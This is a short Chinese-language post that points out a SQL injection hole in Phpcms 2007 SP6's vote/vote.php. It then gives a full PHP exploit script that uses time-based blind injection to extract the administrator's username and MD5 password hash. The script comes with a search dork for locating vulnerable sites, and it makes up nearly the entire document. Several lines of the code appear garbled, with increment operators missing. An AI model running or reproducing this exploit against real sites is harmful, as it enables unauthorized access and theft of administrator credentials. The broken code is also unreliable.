漏洞代码: vote/vote.php // 22行 $optionids = is_array($op) ? implode(',',$op) : $op; ... $db->query("UPDATE ".TABLE_VOTE_OPTION." SET number = number 1 WHERE optionid IN ($optionids) "); 漏洞很明显,没什么好说的,其他地方也有类似的问题,有兴趣的同学可以跟下,下面给个poc性质的exp[由于是盲注,效果不是很好]:p 代码: #!/usr/bin/php <?php print_r(' --------------------------------------------------------------------------- Phpcms 2007 SP6 Bind SQL injection / admin credentials disclosure exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org dork: "Powered by Phpcms 2007" --------------------------------------------------------------------------- '); /** * works regardless of php.ini settings */ if ($argc < 3) { print_r(' --------------------------------------------------------------------------- Usage: php '.$argv[0].' host path host: target server (ip/hostname) path: path to phpcms Example: php '.$argv[0].' localhost /phpcms/ --------------------------------------------------------------------------- '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $benchmark = 100000000; $timeout = 10; $cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/ryat#'; $resp = send(); preg_match('/([a-z0-9] )_vote_option/', $resp, $pre); if ($pre) { echo "Plz Waiting...\n"; /** * get admin password */ $j = 1; $pass = ''; $hash[0] = 0; //null $hash = array_merge($hash, range(48, 57)); //numbers $hash = array_merge($hash, range(97, 102)); //a-f letters while (strlen($pass) < 32) { for ($i = 0; $i <= 255; $i ) { if (in_array($i, $hash)) { $cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/(IF((ASCII(SUBSTRING((SELECT/**/password/**/FROM/**/'.$pre[1].'_member/**/WHERE/**/groupid=1/**/LIMIT/**/1),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))#'; send(); usleep(2000000); $starttime = time(); send(); $endtime = time(); $difftime = $endtime - $starttime; if ($difftime > $timeout) { $pass .= chr($i); echo chr($i); break; } } if ($i == 255) exit("\nExploit Failed!\n"); } 
$j ; } echo "\t"; /** * get admin username */ $j = 1; $user = ''; while (strstr($user, chr(0)) === false) { for ($i = 0; i <= 255; $i ) { $cmd = 'voteid=999999&attribute=1&op=999999)/**/AND/**/(IF((ASCII(SUBSTRING((SELECT/**/username/**/FROM/**/'.$pre[1].'_member/**/WHERE/**/groupid=1/**/LIMIT/**/1),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))#'; send(); usleep(2000000); $starttime = time(); send(); $endtime = time(); $difftime = $endtime - $starttime; if ($difftime > $timeout) { $user .= chr($i); echo chr($i); break; } if ($i == 255) exit("\nExploit Failed!\n"); } $j ; } exit("Expoilt Success!\nadmin:\t$user\nPassword(md5):\t$pass\n"); } else exit("Exploit Failed!\n"); function send() { global $host, $path, $cmd; $message = "POST ".$path."vote/vote.php HTTP/1.1\r\n"; $message .= "Accept: */*\r\n"; $message .= "Accept-Language: zh-cn\r\n"; $message .= "Content-Type: application/x-www-form-urlencoded\r\n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n"; $message .= "CLIENT-IP: ".time()."\r\n"; $message .= "Host: $host\r\n"; $message .= "Content-Length: ".strlen($cmd)."\r\n"; $message .= "Connection: Close\r\n\r\n"; $message .= $cmd; $fp = fsockopen($host, 80); fputs($fp, $message); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?> |